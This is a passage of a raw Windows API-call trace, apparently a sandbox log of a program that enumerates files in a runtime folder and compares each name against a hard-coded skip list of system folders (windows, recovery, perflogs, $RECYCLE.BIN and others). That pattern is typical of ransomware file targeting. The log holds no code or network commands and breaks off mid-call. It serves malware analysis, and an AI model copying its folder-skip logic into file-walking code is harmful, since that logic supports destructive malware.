[0069.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.714] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="klist.exe", cAlternateFileName="")) returned 1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2=".") returned 1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="..") returned 1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="...") returned 1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="windows") returned -1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="recovery") returned -1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="perflogs") returned -1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="documents and settings") returned 1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="system volume information") returned -1 [0069.714] lstrcmpiW (lpString1="klist.exe", lpString2="msocache") returned -1 [0069.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="klist.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="klist.exe", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="klist.exe", lpUsedDefaultChar=0x0) returned 9 [0069.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="klist.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="klist.exe", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="klist.exe", lpUsedDefaultChar=0x0) returned 9 [0069.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.714] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="ktab.exe", cAlternateFileName="")) returned 1 [0069.714] lstrcmpiW (lpString1="ktab.exe", lpString2=".") returned 1 [0069.714] lstrcmpiW (lpString1="ktab.exe", lpString2="..") returned 1 [0069.714] lstrcmpiW (lpString1="ktab.exe", lpString2="...") returned 1 [0069.714] lstrcmpiW (lpString1="ktab.exe", lpString2="windows") returned -1 [0069.715] lstrcmpiW (lpString1="ktab.exe", lpString2="recovery") returned -1 [0069.715] lstrcmpiW (lpString1="ktab.exe", lpString2="perflogs") returned -1 [0069.715] lstrcmpiW (lpString1="ktab.exe", lpString2="documents and settings") returned 1 [0069.715] lstrcmpiW (lpString1="ktab.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.715] lstrcmpiW (lpString1="ktab.exe", lpString2="system volume information") returned -1 [0069.715] lstrcmpiW (lpString1="ktab.exe", lpString2="msocache") returned -1 [0069.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ktab.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ktab.exe", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ktab.exe", lpUsedDefaultChar=0x0) returned 8 [0069.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ktab.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ktab.exe", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ktab.exe", lpUsedDefaultChar=0x0) returned 8 [0069.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0069.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.715] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="lcms.dll", cAlternateFileName="")) returned 1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2=".") returned 1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="..") returned 1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="...") returned 1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="windows") returned -1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="recovery") returned -1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="perflogs") returned -1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="documents and settings") returned 1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="system volume information") returned -1 [0069.715] lstrcmpiW (lpString1="lcms.dll", lpString2="msocache") returned -1 [0069.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lcms.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lcms.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lcms.dll", lpUsedDefaultChar=0x0) returned 8 [0069.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lcms.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lcms.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lcms.dll", lpUsedDefaultChar=0x0) returned 8 [0069.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0069.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0069.716] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="management.dll", cAlternateFileName="MANAGE~1.DLL")) returned 1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2=".") returned 1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="..") returned 1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="...") returned 1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="windows") returned -1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="recovery") returned -1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="perflogs") returned -1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="documents and settings") returned 1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="system volume information") returned -1 [0069.716] lstrcmpiW (lpString1="management.dll", lpString2="msocache") returned -1 [0069.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0069.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="management.dll", lpUsedDefaultChar=0x0) returned 14 [0069.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0069.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="management.dll", lpUsedDefaultChar=0x0) returned 14 [0069.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.716] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9fa40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="mlib_image.dll", cAlternateFileName="MLIB_I~1.DLL")) returned 1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2=".") returned 1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2="..") returned 1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2="...") returned 1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2="windows") returned -1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2="recovery") returned -1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2="perflogs") returned -1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2="documents and settings") returned 1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.716] lstrcmpiW (lpString1="mlib_image.dll", lpString2="system volume information") returned -1 [0069.717] lstrcmpiW (lpString1="mlib_image.dll", lpString2="msocache") returned -1 [0069.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mlib_image.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mlib_image.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mlib_image.dll", lpUsedDefaultChar=0x0) returned 14 [0069.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mlib_image.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mlib_image.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mlib_image.dll", lpUsedDefaultChar=0x0) returned 14 [0069.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.717] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa12a0, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2=".") returned 1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="..") returned 1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="...") returned 1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="windows") returned -1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="recovery") returned -1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="perflogs") returned -1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="documents and settings") returned 1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="system volume information") returned -1 [0069.717] lstrcmpiW (lpString1="msvcp120.dll", lpString2="msocache") returned 1 [0069.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0069.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0069.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.717] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0069.717] lstrcmpiW (lpString1="msvcr100.dll", lpString2=".") returned 1 [0069.717] lstrcmpiW (lpString1="msvcr100.dll", lpString2="..") returned 1 [0069.717] lstrcmpiW (lpString1="msvcr100.dll", lpString2="...") returned 1 [0069.718] lstrcmpiW (lpString1="msvcr100.dll", lpString2="windows") returned -1 [0069.718] lstrcmpiW (lpString1="msvcr100.dll", lpString2="recovery") returned -1 [0069.718] lstrcmpiW (lpString1="msvcr100.dll", lpString2="perflogs") returned -1 [0069.718] lstrcmpiW (lpString1="msvcr100.dll", lpString2="documents and settings") returned 1 [0069.718] lstrcmpiW (lpString1="msvcr100.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.718] lstrcmpiW (lpString1="msvcr100.dll", lpString2="system volume information") returned -1 [0069.718] lstrcmpiW (lpString1="msvcr100.dll", lpString2="msocache") returned 1 [0069.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr100.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr100.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr100.dll", lpUsedDefaultChar=0x0) returned 12 [0069.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr100.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr100.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr100.dll", lpUsedDefaultChar=0x0) returned 12 [0069.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.718] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a0, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2=".") returned 1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="..") returned 1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="...") returned 1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="windows") returned -1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="recovery") returned -1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="perflogs") returned -1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="documents and settings") returned 1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="system volume information") returned -1 [0069.718] lstrcmpiW (lpString1="msvcr120.dll", lpString2="msocache") returned 1 [0069.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0069.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0069.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.719] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17a40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="net.dll", cAlternateFileName="")) returned 1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2=".") returned 1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="..") returned 1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="...") returned 1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="windows") returned -1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="recovery") returned -1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="perflogs") returned -1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="documents and settings") returned 1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="system volume information") returned -1 [0069.719] lstrcmpiW (lpString1="net.dll", lpString2="msocache") returned 1 [0069.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, 